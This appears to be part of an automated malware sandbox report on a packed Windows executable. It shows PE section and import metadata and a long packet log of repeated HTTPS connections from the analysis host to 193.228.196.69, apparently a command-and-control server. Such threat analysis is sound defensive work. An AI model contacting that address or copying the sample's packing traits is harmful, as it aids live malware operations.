jp 00007FE39539F694h
arpl word ptr [edx+edx], bx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2ad048	0x1dc	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x14a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2ad028	0x10	.data
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2ad000	0x18	.data
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x9000	0x4c00	14b13f2e29b77e4d3fda22241220b045	False	0.9877158717105263	data	7.966731476719586	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0xa000	0x1000	0x600	99020d56252fcda2bdac25bf42dc620d	False	0.888671875	data	7.259672355449528	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0xb000	0x1000	0x400	3b7361e63ee7bbcb420c0658f330f542	False	0.7197265625	data	6.05275232231636	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0xc000	0x5000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x11000	0x1000	0x200	61f511e549dc9e030ea46063f0fa6e97	False	0.13671875	data	1.057346078853637	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x12000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x13000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x14000	0x1000	0xc00	6fb5280e0b315f9c41db1969b24df793	False	0.9449869791666666	data	7.701925098808373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x15000	0x2000	0x400	2958f9fa038a733e29e1f162b7b67b08	False	0.666015625	data	5.68601805333189	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x17000	0x2000	0x1600	2973db0eb484341bfb083a28d4be67ee	False	0.35493607954545453	data	4.177592223626376	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x19000	0x291000	0xcc9000	f763e5b0ab80763dd8cf2815671e787d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x2aa000	0xf0000	0xef200	f8f55499fd9528a7f05de385d4ea1891	False	0.9872704848405646	data	7.971716917592086	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_STRING	0x17238	0xd0	data			0.5288461538461539
RT_STRING	0x17308	0xb8	data			0.6467391304347826
RT_STRING	0x173c0	0x240	data			0.4670138888888889
RT_STRING	0x17600	0x35c	data			0.42093023255813955
RT_STRING	0x1795c	0x280	data			0.4171875
RT_RCDATA	0x15bdc	0x200	empty			0
RT_RCDATA	0x15ddc	0x30	empty			0
RT_VERSION	0x17bdc	0x2ec	data	English	United States	0.43315508021390375
RT_MANIFEST	0x17ec8	0x5de	XML 1.0 document, ASCII text	English	United States	0.42543275632490013

Imports

DLL	Import
kernel32.dll	GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
user32.dll	MessageBoxA
advapi32.dll	RegCloseKey
oleaut32.dll	SysFreeString
gdi32.dll	CreateFontA
shell32.dll	ShellExecuteA
version.dll	GetFileVersionInfoA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 14:21:13.700006962 CEST	49704	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:13.700043917 CEST	443	49704	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:13.700117111 CEST	49704	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:13.700644016 CEST	49704	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:13.700656891 CEST	443	49704	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:14.348762035 CEST	443	49704	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:14.349010944 CEST	49704	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:14.349025011 CEST	443	49704	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:14.349116087 CEST	49704	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:14.349119902 CEST	443	49704	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:14.351226091 CEST	443	49704	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:14.351300955 CEST	49704	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:14.351820946 CEST	49704	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:14.352010965 CEST	49704	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:14.352045059 CEST	443	49704	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:14.352097034 CEST	49704	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:16.924845934 CEST	49705	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:16.924940109 CEST	443	49705	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:16.925035000 CEST	49705	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:16.925751925 CEST	49705	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:16.925791025 CEST	443	49705	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:17.338577986 CEST	443	49705	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:17.338831902 CEST	49705	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:17.338893890 CEST	443	49705	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:17.338947058 CEST	49705	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:17.338965893 CEST	443	49705	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:17.339987040 CEST	443	49705	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:17.340071917 CEST	49705	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:17.340698957 CEST	49705	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:17.340831995 CEST	443	49705	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:17.340866089 CEST	49705	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:17.340888977 CEST	443	49705	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:17.340929985 CEST	49705	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:20.262738943 CEST	49706	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:20.262824059 CEST	443	49706	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:20.262923002 CEST	49706	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:20.263423920 CEST	49706	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:20.263459921 CEST	443	49706	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:20.676882982 CEST	443	49706	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:20.677063942 CEST	49706	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:20.677113056 CEST	443	49706	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:20.677345037 CEST	49706	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:20.677359104 CEST	443	49706	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:20.678452969 CEST	443	49706	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:20.678513050 CEST	49706	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:20.679109097 CEST	49706	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:20.679193974 CEST	49706	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:20.679267883 CEST	443	49706	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:20.679327011 CEST	49706	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:23.430659056 CEST	49707	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:23.430706978 CEST	443	49707	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:23.430800915 CEST	49707	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:23.431411028 CEST	49707	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:23.431428909 CEST	443	49707	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:23.847700119 CEST	443	49707	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:23.847948074 CEST	49707	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:23.847976923 CEST	443	49707	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:23.848118067 CEST	49707	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:23.848126888 CEST	443	49707	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:23.851991892 CEST	443	49707	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:23.852123022 CEST	49707	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:23.853106022 CEST	49707	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:23.853106022 CEST	49707	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:23.853256941 CEST	443	49707	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:23.853557110 CEST	49707	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:29.030545950 CEST	49712	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:29.030586004 CEST	443	49712	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:29.030694008 CEST	49712	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:29.031137943 CEST	49712	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:29.031152010 CEST	443	49712	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:29.446249008 CEST	443	49712	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:29.446801901 CEST	49712	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:29.446839094 CEST	443	49712	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:29.446924925 CEST	49712	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:29.446933031 CEST	443	49712	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:29.449270964 CEST	443	49712	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:29.449346066 CEST	49712	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:29.449894905 CEST	49712	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:29.450038910 CEST	49712	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:29.450092077 CEST	443	49712	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:29.450146914 CEST	49712	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:33.367413998 CEST	49716	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:33.367455006 CEST	443	49716	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:33.367522955 CEST	49716	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:33.368006945 CEST	49716	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:33.368021965 CEST	443	49716	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:33.784130096 CEST	443	49716	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:33.784383059 CEST	49716	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:33.784403086 CEST	443	49716	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:33.784427881 CEST	49716	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:33.784435034 CEST	443	49716	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:33.785440922 CEST	443	49716	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:33.785522938 CEST	49716	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:33.786063910 CEST	49716	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:33.786187887 CEST	443	49716	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:33.786510944 CEST	49716	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:33.786510944 CEST	49716	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:33.786523104 CEST	443	49716	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:36.828788996 CEST	49717	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:36.828835011 CEST	443	49717	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:36.828933954 CEST	49717	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:36.829427004 CEST	49717	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:36.829452038 CEST	443	49717	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:37.253329039 CEST	443	49717	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:37.253509045 CEST	49717	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:37.253537893 CEST	443	49717	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:37.253658056 CEST	49717	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:37.253664017 CEST	443	49717	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:37.257438898 CEST	443	49717	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:37.257513046 CEST	49717	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:37.258055925 CEST	49717	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:37.258153915 CEST	49717	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:37.258407116 CEST	443	49717	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:37.258459091 CEST	49717	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:40.562953949 CEST	49718	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:40.563035965 CEST	443	49718	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:40.563153028 CEST	49718	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:40.564004898 CEST	49718	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:40.564044952 CEST	443	49718	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:40.977607012 CEST	443	49718	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:40.977933884 CEST	49718	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:40.977933884 CEST	49718	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:40.977997065 CEST	443	49718	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:40.978053093 CEST	443	49718	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:40.979512930 CEST	443	49718	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:40.979605913 CEST	49718	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:40.980128050 CEST	49718	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:40.980242968 CEST	49718	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:40.980294943 CEST	443	49718	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:40.980372906 CEST	49718	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:45.269298077 CEST	49719	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:45.269349098 CEST	443	49719	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:45.269464016 CEST	49719	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:45.269973993 CEST	49719	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:45.269988060 CEST	443	49719	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:45.684370041 CEST	443	49719	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:45.684587002 CEST	49719	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:45.684607983 CEST	443	49719	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:45.684829950 CEST	49719	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:45.684834957 CEST	443	49719	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:45.685726881 CEST	443	49719	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:45.685795069 CEST	49719	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:45.686496019 CEST	49719	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:45.686616898 CEST	49719	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:45.686619043 CEST	443	49719	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:45.686626911 CEST	443	49719	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:45.892123938 CEST	443	49719	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:45.892200947 CEST	49719	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:47.434578896 CEST	49720	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:47.434624910 CEST	443	49720	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:47.434711933 CEST	49720	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:47.435359001 CEST	49720	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:47.435373068 CEST	443	49720	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:47.854578972 CEST	443	49720	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:47.854720116 CEST	49720	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:47.854732990 CEST	443	49720	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:47.854832888 CEST	49720	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:47.854836941 CEST	443	49720	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:47.856277943 CEST	443	49720	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:47.856336117 CEST	49720	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:47.857131004 CEST	49720	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:47.857276917 CEST	443	49720	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:47.857355118 CEST	49720	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:47.857531071 CEST	49720	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:47.857544899 CEST	443	49720	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:49.594197035 CEST	49721	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:49.594234943 CEST	443	49721	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:49.594305992 CEST	49721	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:49.594871998 CEST	49721	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:49.594883919 CEST	443	49721	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:50.009289980 CEST	443	49721	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:50.009537935 CEST	49721	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:50.009562016 CEST	443	49721	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:50.009675980 CEST	49721	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:50.009680033 CEST	443	49721	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:50.010693073 CEST	443	49721	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:50.010765076 CEST	49721	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:50.011384964 CEST	49721	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:50.011497021 CEST	443	49721	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:50.011497021 CEST	49721	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:50.011507034 CEST	443	49721	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:50.216129065 CEST	443	49721	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:50.216387987 CEST	49721	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:51.421624899 CEST	49722	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:51.421670914 CEST	443	49722	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:51.421849966 CEST	49722	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:51.422234058 CEST	49722	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:51.422246933 CEST	443	49722	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:51.840786934 CEST	443	49722	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:51.841028929 CEST	49722	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:51.841047049 CEST	443	49722	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:51.841135025 CEST	49722	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:51.841140032 CEST	443	49722	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:51.842196941 CEST	443	49722	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:51.842264891 CEST	49722	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:51.842839003 CEST	49722	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:51.842921972 CEST	49722	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:51.842972040 CEST	443	49722	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:51.843063116 CEST	49722	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:52.600698948 CEST	49723	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:52.600739002 CEST	443	49723	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:52.600855112 CEST	49723	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:52.601357937 CEST	49723	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:52.601373911 CEST	443	49723	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:53.014206886 CEST	443	49723	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:53.014416933 CEST	49723	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:53.014441967 CEST	443	49723	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:53.014482975 CEST	49723	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:53.014487982 CEST	443	49723	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:53.015538931 CEST	443	49723	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:53.015598059 CEST	49723	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:53.016132116 CEST	49723	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:53.016256094 CEST	443	49723	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:53.016376019 CEST	49723	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:53.016436100 CEST	49723	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:53.016453028 CEST	443	49723	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:53.732498884 CEST	49724	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:53.732537031 CEST	443	49724	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:53.732621908 CEST	49724	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:53.732990980 CEST	49724	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:53.733016014 CEST	443	49724	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:54.153116941 CEST	443	49724	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:54.153403044 CEST	49724	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:54.153491974 CEST	443	49724	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:54.153561115 CEST	49724	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:54.153575897 CEST	443	49724	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:54.157102108 CEST	443	49724	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:54.157186031 CEST	49724	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:54.157754898 CEST	49724	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:54.157845020 CEST	49724	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:54.158092022 CEST	443	49724	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:54.158154964 CEST	49724	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:54.906022072 CEST	49725	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:54.906080961 CEST	443	49725	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:54.906249046 CEST	49725	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:54.907000065 CEST	49725	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:54.907016039 CEST	443	49725	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:55.330892086 CEST	443	49725	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:55.331111908 CEST	49725	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:55.331167936 CEST	443	49725	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:55.331217051 CEST	49725	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:55.331229925 CEST	443	49725	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:55.332299948 CEST	443	49725	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:55.332498074 CEST	49725	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:55.332851887 CEST	49725	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:55.332957983 CEST	49725	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:55.332977057 CEST	443	49725	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:55.333026886 CEST	49725	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:56.105215073 CEST	49726	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:56.105240107 CEST	443	49726	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:56.105374098 CEST	49726	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:56.105864048 CEST	49726	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:56.105875969 CEST	443	49726	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:56.527997017 CEST	443	49726	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:56.528177023 CEST	49726	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:56.528189898 CEST	443	49726	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:56.528422117 CEST	49726	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:56.528426886 CEST	443	49726	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:56.532011032 CEST	443	49726	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:56.532125950 CEST	49726	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:56.532833099 CEST	49726	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:56.532991886 CEST	443	49726	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:56.533030033 CEST	49726	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:56.533035040 CEST	443	49726	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:56.740156889 CEST	443	49726	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:56.740252972 CEST	49726	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:57.331981897 CEST	49727	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:57.332061052 CEST	443	49727	193.228.196.69	192.168.2.7
Apr 25, 2024 14:21:57.332164049 CEST	49727	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:57.332766056 CEST	49727	443	192.168.2.7	193.228.196.69
Apr 25, 2024 14:21:57.332802057 CEST	443	49727	193.228.196.69	192.168.2.7
